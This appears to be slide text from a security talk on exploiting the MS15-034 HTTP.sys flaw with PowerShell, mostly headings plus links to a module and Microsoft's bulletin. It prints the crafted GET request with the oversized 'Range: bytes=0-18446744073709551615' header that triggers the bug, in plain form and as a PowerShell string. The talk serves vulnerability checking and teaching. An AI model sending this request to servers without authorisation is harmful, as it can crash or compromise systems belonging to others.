Post on 24-Jan-2017
EXPLOITING MS15-034 IN POWERSHELL
KIERAN JACOBSENTECHNICAL LEAD - READIFY
@KJACOBSEN – POSHSECURITY.COM
‘REMOTE CODE EXECUTION’ -IN HTTP.SYS
IF THE BAD GUY CAN EXECUTE CODE ON YOUR BOX, IT ISN’T YOUR BOX
ANYMORE.
HTTP.SYS IS EVERYWHERE
IIS KERNEL CACHING MODULE
ARE WE VULNERABLE?
REQUEST -> RESPONSE
GET / HTTP/1.1HOST: GOOGLE.COMRANGE: BYTES=0-18446744073709551615CONNECTION: CLOSE
GET / HTTP/1.1`R`NHOST: GOOGLE.COM`R`NRANGE: BYTES=0-18446744073709551615`R`NCONNECTION: CLOSE `R`N`R`N
STREAMS
WORKING WITH TCP
MS15034.PSM1
MORE INFORMATION
• MY WEBSITE – HTTP://POSHSECURITY.COM• TWITTER - @KJACOBSEN• MS15-034 MODULE – HTTP://GITHUB.COM/POSHSECURITY/MS15034 • MICROSOFT SECURITY BULLETIN - HTTPS://
TECHNET.MICROSOFT.COM/EN-US/LIBRARY/SECURITY/MS15-034.ASPX